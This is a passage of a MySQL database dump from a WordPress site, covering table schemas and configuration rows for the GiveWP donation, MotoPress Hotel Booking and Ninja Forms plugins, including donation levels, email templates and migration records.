(18,21,'_give_donation_levels','a:5:{i:0;a:2:{s:8:\"_give_id\";a:1:{s:8:\"level_id\";s:1:\"0\";}s:12:\"_give_amount\";s:9:\"10.000000\";}i:1;a:2:{s:8:\"_give_id\";a:1:{s:8:\"level_id\";s:1:\"1\";}s:12:\"_give_amount\";s:9:\"25.000000\";}i:2;a:2:{s:8:\"_give_id\";a:1:{s:8:\"level_id\";s:1:\"2\";}s:12:\"_give_amount\";s:9:\"50.000000\";}i:3;a:3:{s:8:\"_give_id\";a:1:{s:8:\"level_id\";s:1:\"3\";}s:12:\"_give_amount\";s:10:\"100.000000\";s:13:\"_give_default\";s:7:\"default\";}i:4;a:2:{s:8:\"_give_id\";a:1:{s:8:\"level_id\";s:1:\"5\";}s:12:\"_give_amount\";s:10:\"250.000000\";}}'),
(19,21,'_give_default_gateway','global'),
(20,21,'_give_name_title_prefix','global'),
(21,21,'_give_title_prefixes',''),
(22,21,'_give_company_field','global'),
(23,21,'_give_anonymous_donation','global'),
(24,21,'_give_donor_comment','global'),
(25,21,'_give_logged_in_only','enabled'),
(26,21,'_give_show_register_form','none'),
(27,21,'_give_goal_option','disabled'),
(28,21,'_give_goal_format','amount'),
(29,21,'_give_set_goal','10000'),
(30,21,'_give_number_of_donor_goal','100'),
(31,21,'_give_goal_color','#4fa651'),
(32,21,'_give_close_form_when_goal_achieved','disabled'),
(33,21,'_give_form_goal_achieved_message','Thank you to all our donors, we have met our fundraising goal.'),
(34,21,'_give_terms_option','global'),
(35,21,'_give_agree_label','Agree to terms?'),
(36,21,'_give_agree_text','The terms can be customized in the donation form settings.'),
(37,21,'give_stripe_per_form_accounts','disabled'),
(38,21,'_give_default_stripe_account',''),
(39,21,'_give_email_options','global'),
(40,21,'_give_email_template','default'),
(41,21,'_give_email_logo',''),
(42,21,'_give_from_name','Gsw2023'),
(43,21,'_give_from_email','ay.zaghweb@gmail.com'),
(44,21,'_give_new-donation_notification','global'),
(45,21,'_give_new-donation_email_subject','New Donation - #{payment_id}'),
(46,21,'_give_new-donation_email_header','New Donation!'),
(47,21,'_give_new-donation_email_message','Hi there,\n\nThis email is to inform you that a new donation has been made on your website: {site_url}.\n\n<strong>Donor:</strong> {name}\n<strong>Donation:</strong> {donation}\n<strong>Amount:</strong> {amount}\n<strong>Payment Method:</strong> {payment_method}\n\nThank you,\n\n{sitename}\n'),
(48,21,'_give_new-donation_email_content_type','text/html'),
(49,21,'_give_new-donation_recipient','a:1:{s:5:\"email\";s:20:\"ay.zaghweb@gmail.com\";}'),
(50,21,'_give_donation-receipt_notification','global'),
(51,21,'_give_donation-receipt_email_subject','Donation Receipt'),
(52,21,'_give_donation-receipt_email_header','Donation Receipt'),
(53,21,'_give_donation-receipt_email_mesage','Dear {name},\n\nThank you for your donation. Your generosity is appreciated! Here are the details of your donation:\n\n<strong>Donor:</strong> {fullname}\n<strong>Donation:</strong> {donation}\n<strong>Donation Date:</strong> {date}\n<strong>Amount:</strong> {amount}\n<strong>Payment Method:</strong> {payment_method}\n<strong>Payment ID:</strong> {payment_id}\n\n{receipt_link}\n\n\n\nSincerely,\n{sitename}\n'),
(54,21,'_give_donation-receipt_email_content_type','text/html'),
(55,21,'_give_form_goal_progress','-1'),
(56,21,'_give_offline_checkout_notes','<em>You can customize instructions in the forms settings.</em><br /><br /><strong>Please make checks payable to \"{sitename}\".</strong><br /><br />Your donation is greatly appreciated!');
/*!40000 ALTER TABLE `dnctiavkr_give_formmeta` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `dnctiavkr_give_log`
--

DROP TABLE IF EXISTS `dnctiavkr_give_log`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `dnctiavkr_give_log` (
  `id` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
  `log_type` varchar(16) NOT NULL,
  `data` text NOT NULL,
  `category` varchar(64) NOT NULL,
  `source` varchar(64) NOT NULL,
  `date` datetime NOT NULL,
  PRIMARY KEY (`id`),
  KEY `log_type` (`log_type`),
  KEY `category` (`category`),
  KEY `source` (`source`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `dnctiavkr_give_log`
--

LOCK TABLES `dnctiavkr_give_log` WRITE;
/*!40000 ALTER TABLE `dnctiavkr_give_log` DISABLE KEYS */;
/*!40000 ALTER TABLE `dnctiavkr_give_log` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `dnctiavkr_give_migrations`
--

DROP TABLE IF EXISTS `dnctiavkr_give_migrations`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `dnctiavkr_give_migrations` (
  `id` varchar(180) NOT NULL,
  `status` varchar(16) NOT NULL,
  `error` text DEFAULT NULL,
  `last_run` datetime NOT NULL,
  PRIMARY KEY (`id`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `dnctiavkr_give_migrations`
--

LOCK TABLES `dnctiavkr_give_migrations` WRITE;
/*!40000 ALTER TABLE `dnctiavkr_give_migrations` DISABLE KEYS */;
INSERT INTO `dnctiavkr_give_migrations` VALUES
('add_paymentmode_to_subscription_table','success','','2023-03-29 23:25:46'),
('add-missing-donor-id-in-donation-comments','success','','2023-03-29 23:25:46'),
('add-missing-transaction-id-for-uncompleted-stripe-donations','success','','2022-10-03 17:45:30'),
('add-statement-descriptor-to-stripe-accounts','success','','2022-10-03 17:45:30'),
('complete-removed-legacy-log-migration','success','','2022-10-03 17:45:30'),
('create_migrations_table','success','','2022-10-03 17:45:30'),
('create_new_log_table','success','','2022-10-03 17:45:30'),
('create_revenue_table','success','','2022-10-03 17:45:30'),
('create_subscription_tables','success','','2022-10-03 17:45:30'),
('delete_old_log_tables','success','','2022-10-03 17:45:30'),
('migrate_completed_migrations','success','','2022-10-03 17:45:30'),
('remove_revenue_foreign_keys','success','','2022-10-03 17:45:30'),
('remove_sensitive_logs','success','','2022-10-03 17:45:30'),
('remove-log-with-card-info','success','','2022-10-03 17:45:30'),
('remove-paypal-ipn-verification-setting','success','','2022-10-03 17:45:30'),
('set_automatic_formatting_option','success','','2023-03-29 23:25:46'),
('set_paypal_standard_id_to_paypal_from_paypal_standard','success','','2022-10-03 17:45:30'),
('set-form-donation-levels-to-strings','success','','2022-10-03 17:45:30');
/*!40000 ALTER TABLE `dnctiavkr_give_migrations` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `dnctiavkr_give_revenue`
--

DROP TABLE IF EXISTS `dnctiavkr_give_revenue`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `dnctiavkr_give_revenue` (
  `id` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
  `donation_id` bigint(20) unsigned NOT NULL,
  `form_id` bigint(20) unsigned NOT NULL,
  `amount` int(10) unsigned NOT NULL,
  PRIMARY KEY (`id`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `dnctiavkr_give_revenue`
--

LOCK TABLES `dnctiavkr_give_revenue` WRITE;
/*!40000 ALTER TABLE `dnctiavkr_give_revenue` DISABLE KEYS */;
/*!40000 ALTER TABLE `dnctiavkr_give_revenue` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `dnctiavkr_give_sequential_ordering`
--

DROP TABLE IF EXISTS `dnctiavkr_give_sequential_ordering`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `dnctiavkr_give_sequential_ordering` (
  `id` bigint(20) NOT NULL AUTO_INCREMENT,
  `payment_id` bigint(20) NOT NULL,
  PRIMARY KEY (`id`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `dnctiavkr_give_sequential_ordering`
--

LOCK TABLES `dnctiavkr_give_sequential_ordering` WRITE;
/*!40000 ALTER TABLE `dnctiavkr_give_sequential_ordering` DISABLE KEYS */;
/*!40000 ALTER TABLE `dnctiavkr_give_sequential_ordering` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `dnctiavkr_give_sessions`
--

DROP TABLE IF EXISTS `dnctiavkr_give_sessions`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `dnctiavkr_give_sessions` (
  `session_id` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
  `session_key` char(32) NOT NULL,
  `session_value` longtext NOT NULL,
  `session_expiry` bigint(20) unsigned NOT NULL,
  PRIMARY KEY (`session_key`),
  UNIQUE KEY `session_id` (`session_id`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `dnctiavkr_give_sessions`
--

LOCK TABLES `dnctiavkr_give_sessions` WRITE;
/*!40000 ALTER TABLE `dnctiavkr_give_sessions` DISABLE KEYS */;
/*!40000 ALTER TABLE `dnctiavkr_give_sessions` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `dnctiavkr_give_subscriptionmeta`
--

DROP TABLE IF EXISTS `dnctiavkr_give_subscriptionmeta`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `dnctiavkr_give_subscriptionmeta` (
  `meta_id` bigint(20) NOT NULL AUTO_INCREMENT,
  `subscription_id` bigint(20) NOT NULL,
  `meta_key` varchar(255) CHARACTER SET utf8mb4 COLLATE utf8mb4_unicode_520_ci DEFAULT NULL,
  `meta_value` longtext CHARACTER SET utf8mb4 COLLATE utf8mb4_unicode_520_ci DEFAULT NULL,
  PRIMARY KEY (`meta_id`),
  KEY `subscription_id` (`subscription_id`),
  KEY `meta_key` (`meta_key`(191))
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `dnctiavkr_give_subscriptionmeta`
--

LOCK TABLES `dnctiavkr_give_subscriptionmeta` WRITE;
/*!40000 ALTER TABLE `dnctiavkr_give_subscriptionmeta` DISABLE KEYS */;
/*!40000 ALTER TABLE `dnctiavkr_give_subscriptionmeta` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `dnctiavkr_give_subscriptions`
--

DROP TABLE IF EXISTS `dnctiavkr_give_subscriptions`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `dnctiavkr_give_subscriptions` (
  `id` bigint(20) NOT NULL AUTO_INCREMENT,
  `customer_id` bigint(20) NOT NULL,
  `period` varchar(20) NOT NULL,
  `frequency` bigint(20) NOT NULL DEFAULT 1,
  `initial_amount` decimal(18,10) NOT NULL,
  `recurring_amount` decimal(18,10) NOT NULL,
  `recurring_fee_amount` decimal(18,10) NOT NULL,
  `bill_times` bigint(20) NOT NULL,
  `transaction_id` varchar(60) NOT NULL,
  `parent_payment_id` bigint(20) NOT NULL,
  `payment_mode` varchar(20) NOT NULL DEFAULT '',
  `product_id` bigint(20) NOT NULL,
  `created` datetime NOT NULL,
  `expiration` datetime NOT NULL,
  `status` varchar(20) NOT NULL,
  `profile_id` varchar(60) NOT NULL,
  `notes` longtext NOT NULL,
  PRIMARY KEY (`id`),
  KEY `profile_id` (`profile_id`),
  KEY `customer` (`customer_id`),
  KEY `transaction` (`transaction_id`),
  KEY `customer_and_status` (`customer_id`,`status`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `dnctiavkr_give_subscriptions`
--

LOCK TABLES `dnctiavkr_give_subscriptions` WRITE;
/*!40000 ALTER TABLE `dnctiavkr_give_subscriptions` DISABLE KEYS */;
/*!40000 ALTER TABLE `dnctiavkr_give_subscriptions` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `dnctiavkr_links`
--

DROP TABLE IF EXISTS `dnctiavkr_links`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `dnctiavkr_links` (
  `link_id` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
  `link_url` varchar(255) NOT NULL DEFAULT '',
  `link_name` varchar(255) NOT NULL DEFAULT '',
  `link_image` varchar(255) NOT NULL DEFAULT '',
  `link_target` varchar(25) NOT NULL DEFAULT '',
  `link_description` varchar(255) NOT NULL DEFAULT '',
  `link_visible` varchar(20) NOT NULL DEFAULT 'Y',
  `link_owner` bigint(20) unsigned NOT NULL DEFAULT 1,
  `link_rating` int(11) NOT NULL DEFAULT 0,
  `link_updated` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `link_rel` varchar(255) NOT NULL DEFAULT '',
  `link_notes` mediumtext NOT NULL,
  `link_rss` varchar(255) NOT NULL DEFAULT '',
  PRIMARY KEY (`link_id`),
  KEY `link_visible` (`link_visible`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `dnctiavkr_links`
--

LOCK TABLES `dnctiavkr_links` WRITE;
/*!40000 ALTER TABLE `dnctiavkr_links` DISABLE KEYS */;
/*!40000 ALTER TABLE `dnctiavkr_links` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `dnctiavkr_mphb_api_keys`
--

DROP TABLE IF EXISTS `dnctiavkr_mphb_api_keys`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `dnctiavkr_mphb_api_keys` (
  `key_id` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
  `user_id` bigint(20) unsigned NOT NULL,
  `description` varchar(200) DEFAULT NULL,
  `permissions` varchar(10) NOT NULL,
  `consumer_key` char(64) NOT NULL,
  `consumer_secret` char(43) NOT NULL,
  `nonces` longtext DEFAULT NULL,
  `truncated_key` char(7) NOT NULL,
  `last_access` datetime DEFAULT NULL,
  PRIMARY KEY (`key_id`),
  KEY `consumer_key` (`consumer_key`),
  KEY `consumer_secret` (`consumer_secret`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `dnctiavkr_mphb_api_keys`
--

LOCK TABLES `dnctiavkr_mphb_api_keys` WRITE;
/*!40000 ALTER TABLE `dnctiavkr_mphb_api_keys` DISABLE KEYS */;
/*!40000 ALTER TABLE `dnctiavkr_mphb_api_keys` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `dnctiavkr_mphb_customers`
--

DROP TABLE IF EXISTS `dnctiavkr_mphb_customers`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `dnctiavkr_mphb_customers` (
  `customer_id` int(11) NOT NULL AUTO_INCREMENT,
  `user_id` int(11) DEFAULT NULL,
  `email` varchar(60) NOT NULL,
  `first_name` varchar(60) NOT NULL,
  `last_name` varchar(60) NOT NULL,
  `phone` varchar(20) NOT NULL,
  `country` varchar(2) NOT NULL,
  `state` varchar(20) NOT NULL,
  `city` varchar(20) NOT NULL,
  `address1` text NOT NULL,
  `zip` varchar(10) NOT NULL,
  `bookings` int(11) NOT NULL,
  `date_registered` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `last_active` datetime DEFAULT NULL,
  UNIQUE KEY `email` (`email`),
  UNIQUE KEY `user_id` (`user_id`),
  KEY `customer_id` (`customer_id`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `dnctiavkr_mphb_customers`
--

LOCK TABLES `dnctiavkr_mphb_customers` WRITE;
/*!40000 ALTER TABLE `dnctiavkr_mphb_customers` DISABLE KEYS */;
/*!40000 ALTER TABLE `dnctiavkr_mphb_customers` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `dnctiavkr_mphb_customers_meta`
--

DROP TABLE IF EXISTS `dnctiavkr_mphb_customers_meta`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `dnctiavkr_mphb_customers_meta` (
  `meta_id` int(11) NOT NULL AUTO_INCREMENT,
  `customer_id` int(11) DEFAULT NULL,
  `meta_key` varchar(255) DEFAULT NULL,
  `meta_value` longtext DEFAULT NULL,
  KEY `meta_id` (`meta_id`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `dnctiavkr_mphb_customers_meta`
--

LOCK TABLES `dnctiavkr_mphb_customers_meta` WRITE;
/*!40000 ALTER TABLE `dnctiavkr_mphb_customers_meta` DISABLE KEYS */;
/*!40000 ALTER TABLE `dnctiavkr_mphb_customers_meta` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `dnctiavkr_mphb_sync_logs`
--

DROP TABLE IF EXISTS `dnctiavkr_mphb_sync_logs`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `dnctiavkr_mphb_sync_logs` (
  `log_id` int(11) NOT NULL AUTO_INCREMENT,
  `queue_id` int(11) NOT NULL,
  `log_status` varchar(30) NOT NULL,
  `log_message` text NOT NULL,
  `log_context` text NOT NULL,
  PRIMARY KEY (`log_id`),
  KEY `queue_id` (`queue_id`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `dnctiavkr_mphb_sync_logs`
--

LOCK TABLES `dnctiavkr_mphb_sync_logs` WRITE;
/*!40000 ALTER TABLE `dnctiavkr_mphb_sync_logs` DISABLE KEYS */;
/*!40000 ALTER TABLE `dnctiavkr_mphb_sync_logs` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `dnctiavkr_mphb_sync_queue`
--

DROP TABLE IF EXISTS `dnctiavkr_mphb_sync_queue`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `dnctiavkr_mphb_sync_queue` (
  `queue_id` int(11) NOT NULL AUTO_INCREMENT,
  `queue_name` tinytext NOT NULL,
  `queue_status` varchar(30) NOT NULL,
  PRIMARY KEY (`queue_id`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `dnctiavkr_mphb_sync_queue`
--

LOCK TABLES `dnctiavkr_mphb_sync_queue` WRITE;
/*!40000 ALTER TABLE `dnctiavkr_mphb_sync_queue` DISABLE KEYS */;
/*!40000 ALTER TABLE `dnctiavkr_mphb_sync_queue` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `dnctiavkr_mphb_sync_stats`
--

DROP TABLE IF EXISTS `dnctiavkr_mphb_sync_stats`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `dnctiavkr_mphb_sync_stats` (
  `stat_id` int(11) NOT NULL AUTO_INCREMENT,
  `queue_id` int(11) NOT NULL,
  `import_total` int(11) NOT NULL DEFAULT 0,
  `import_succeed` int(11) NOT NULL DEFAULT 0,
  `import_skipped` int(11) NOT NULL DEFAULT 0,
  `import_failed` int(11) NOT NULL DEFAULT 0,
  `clean_total` int(11) NOT NULL DEFAULT 0,
  `clean_done` int(11) NOT NULL DEFAULT 0,
  `clean_skipped` int(11) NOT NULL DEFAULT 0,
  PRIMARY KEY (`stat_id`),
  UNIQUE KEY `queue_id` (`queue_id`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `dnctiavkr_mphb_sync_stats`
--

LOCK TABLES `dnctiavkr_mphb_sync_stats` WRITE;
/*!40000 ALTER TABLE `dnctiavkr_mphb_sync_stats` DISABLE KEYS */;
/*!40000 ALTER TABLE `dnctiavkr_mphb_sync_stats` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `dnctiavkr_mphb_sync_urls`
--

DROP TABLE IF EXISTS `dnctiavkr_mphb_sync_urls`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `dnctiavkr_mphb_sync_urls` (
  `url_id` int(11) NOT NULL AUTO_INCREMENT,
  `room_id` int(11) NOT NULL,
  `sync_id` varchar(32) NOT NULL,
  `calendar_url` varchar(250) NOT NULL,
  PRIMARY KEY (`url_id`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `dnctiavkr_mphb_sync_urls`
--

LOCK TABLES `dnctiavkr_mphb_sync_urls` WRITE;
/*!40000 ALTER TABLE `dnctiavkr_mphb_sync_urls` DISABLE KEYS */;
/*!40000 ALTER TABLE `dnctiavkr_mphb_sync_urls` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `dnctiavkr_nf3_action_meta`
--

DROP TABLE IF EXISTS `dnctiavkr_nf3_action_meta`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `dnctiavkr_nf3_action_meta` (
  `id` int(11) NOT NULL AUTO_INCREMENT,
  `parent_id` int(11) NOT NULL,
  `key` longtext NOT NULL,
  `value` longtext DEFAULT NULL,
  `meta_key` longtext DEFAULT NULL,
  `meta_value` longtext DEFAULT NULL,
  UNIQUE KEY `id` (`id`)
) ENGINE=InnoDB AUTO_INCREMENT=200 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_general_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `dnctiavkr_nf3_action_meta`
--

LOCK TABLES `dnctiavkr_nf3_action_meta` WRITE;
/*!40000 ALTER TABLE `dnctiavkr_nf3_action_meta` DISABLE KEYS */;
INSERT INTO `dnctiavkr_nf3_action_meta` VALUES
(1,1,'objectType','Action','objectType','Action'),
(2,1,'objectDomain','actions','objectDomain','actions'),
(3,1,'editActive','','editActive',''),
(4,1,'conditions','a:6:{s:9:\"collapsed\";s:0:\"\";s:7:\"process\";s:1:\"1\";s:9:\"connector\";s:3:\"all\";s:4:\"when\";a:1:{i:0;a:6:{s:9:\"connector\";s:3:\"AND\";s:3:\"key\";s:0:\"\";s:10:\"comparator\";s:0:\"\";s:5:\"value\";s:0:\"\";s:4:\"type\";s:5:\"field\";s:9:\"modelType\";s:4:\"when\";}}s:4:\"then\";a:1:{i:0;a:5:{s:3:\"key\";s:0:\"\";s:7:\"trigger\";s:0:\"\";s:5:\"value\";s:0:\"\";s:4:\"type\";s:5:\"field\";s:9:\"modelType\";s:4:\"then\";}}s:4:\"else\";a:0:{}}','conditions','a:6:{s:9:\"collapsed\";s:0:\"\";s:7:\"process\";s:1:\"1\";s:9:\"connector\";s:3:\"all\";s:4:\"when\";a:1:{i:0;a:6:{s:9:\"connector\";s:3:\"AND\";s:3:\"key\";s:0:\"\";s:10:\"comparator\";s:0:\"\";s:5:\"value\";s:0:\"\";s:4:\"type\";s:5:\"field\";s:9:\"modelType\";s:4:\"when\";}}s:4:\"then\";a:1:{i:0;a:5:{s:3:\"key\";s:0:\"\";s:7:\"trigger\";s:0:\"\";s:5:\"value\";s:0:\"\";s:4:\"type\";s:5:\"field\";s:9:\"modelType\";s:4:\"then\";}}s:4:\"else\";a:0:{}}'),
(5,1,'payment_gateways','','payment_gateways',''),
(6,1,'payment_total','','payment_total',''),
(7,1,'tag','','tag',''),
(8,1,'to','','to',''),
(9,1,'email_subject','','email_subject',''),
(10,1,'email_message','','email_message',''),
(11,1,'from_name','','from_name',''),
(12,1,'from_address','','from_address',''),
(13,1,'reply_to','','reply_to',''),
(14,1,'email_format','html','email_format','html'),
(15,1,'cc','','cc',''),
(16,1,'bcc','','bcc',''),
(17,1,'attach_csv','','attach_csv',''),
(18,1,'redirect_url','','redirect_url',''),
(19,1,'email_message_plain','','email_message_plain',''),
(20,2,'to','{field:email}','to','{field:email}'),
(21,2,'subject','This is an email action.','subject','This is an email action.'),
(22,2,'message','Hello, Ninja Forms!','message','Hello, Ninja Forms!'),
(23,2,'objectType','Action','objectType','Action'),
(24,2,'objectDomain','actions','objectDomain','actions'),
(25,2,'editActive','','editActive',''),
(26,2,'conditions','a:6:{s:9:\"collapsed\";s:0:\"\";s:7:\"process\";s:1:\"1\";s:9:\"connector\";s:3:\"all\";s:4:\"when\";a:0:{}s:4:\"then\";a:1:{i:0;a:5:{s:3:\"key\";s:0:\"\";s:7:\"trigger\";s:0:\"\";s:5:\"value\";s:0:\"\";s:4:\"type\";s:5:\"field\";s:9:\"modelType\";s:4:\"then\";}}s:4:\"else\";a:0:{}}','conditions','a:6:{s:9:\"collapsed\";s:0:\"\";s:7:\"process\";s:1:\"1\";s:9:\"connector\";s:3:\"all\";s:4:\"when\";a:0:{}s:4:\"then\";a:1:{i:0;a:5:{s:3:\"key\";s:0:\"\";s:7:\"trigger\";s:0:\"\";s:5:\"value\";s:0:\"\";s:4:\"type\";s:5:\"field\";s:9:\"modelType\";s:4:\"then\";}}s:4:\"else\";a:0:{}}'),
(27,2,'payment_gateways','','payment_gateways',''),
(28,2,'payment_total','','payment_total',''),
(29,2,'tag','','tag',''),
(30,2,'email_subject','Submission Confirmation ','email_subject','Submission Confirmation '),
(31,2,'email_message','<p>{all_fields_table}<br></p>','email_message','<p>{all_fields_table}<br></p>'),
(32,2,'from_name','','from_name',''),
(33,2,'from_address','','from_address',''),
(34,2,'reply_to','','reply_to',''),
(35,2,'email_format','html','email_format','html'),
(36,2,'cc','','cc',''),
(37,2,'bcc','','bcc',''),
(38,2,'attach_csv','','attach_csv',''),
(39,2,'email_message_plain','','email_message_plain',''),
(40,3,'objectType','Action','objectType','Action'),
(41,3,'objectDomain','actions','objectDomain','actions'),
(42,3,'editActive','','editActive',''),
(43,3,'conditions','a:6:{s:9:\"collapsed\";s:0:\"\";s:7:\"process\";s:1:\"1\";s:9:\"connector\";s:3:\"all\";s:4:\"when\";a:1:{i:0;a:6:{s:9:\"connector\";s:3:\"AND\";s:3:\"key\";s:0:\"\";s:10:\"comparator\";s:0:\"\";s:5:\"value\";s:0:\"\";s:4:\"type\";s:5:\"field\";s:9:\"modelType\";s:4:\"when\";}}s:4:\"then\";a:1:{i:0;a:5:{s:3:\"key\";s:0:\"\";s:7:\"trigger\";s:0:\"\";s:5:\"value\";s:0:\"\";s:4:\"type\";s:5:\"field\";s:9:\"modelType\";s:4:\"then\";}}s:4:\"else\";a:0:{}}','conditions','a:6:{s:9:\"collapsed\";s:0:\"\";s:7:\"process\";s:1:\"1\";s:9:\"connector\";s:3:\"all\";s:4:\"when\";a:1:{i:0;a:6:{s:9:\"connector\";s:3:\"AND\";s:3:\"key\";s:0:\"\";s:10:\"comparator\";s:0:\"\";s:5:\"value\";s:0:\"\";s:4:\"type\";s:5:\"field\";s:9:\"modelType\";s:4:\"when\";}}s:4:\"then\";a:1:{i:0;a:5:{s:3:\"key\";s:0:\"\";s:7:\"trigger\";s:0:\"\";s:5:\"value\";s:0:\"\";s:4:\"type\";s:5:\"field\";s:9:\"modelType\";s:4:\"then\";}}s:4:\"else\";a:0:{}}'),
(44,3,'payment_gateways','','payment_gateways',''),
(45,3,'payment_total','','payment_total',''),
(46,3,'tag','','tag',''),
(47,3,'to','{system:admin_email}','to','{system:admin_email}'),
(48,3,'email_subject','New message from {field:name}','email_subject','New message from {field:name}'),
(49,3,'email_message','<p>{field:message}</p><p>-{field:name} ( {field:email} )</p>','email_message','<p>{field:message}</p><p>-{field:name} ( {field:email} )</p>'),
(50,3,'from_name','','from_name',''),
(51,3,'from_address','','from_address',''),
(52,3,'reply_to','{field:email}','reply_to','{field:email}'),
(53,3,'email_format','html','email_format','html'),
(54,3,'cc','','cc',''),
(55,3,'bcc','','bcc',''),
(56,3,'attach_csv','0','attach_csv','0'),
(57,3,'email_message_plain','','email_message_plain',''),
(58,4,'message','Thank you {field:name} for filling out my form!','message','Thank you {field:name} for filling out my form!'),
(59,4,'objectType','Action','objectType','Action'),
(60,4,'objectDomain','actions','objectDomain','actions'),
(61,4,'editActive','','editActive',''),
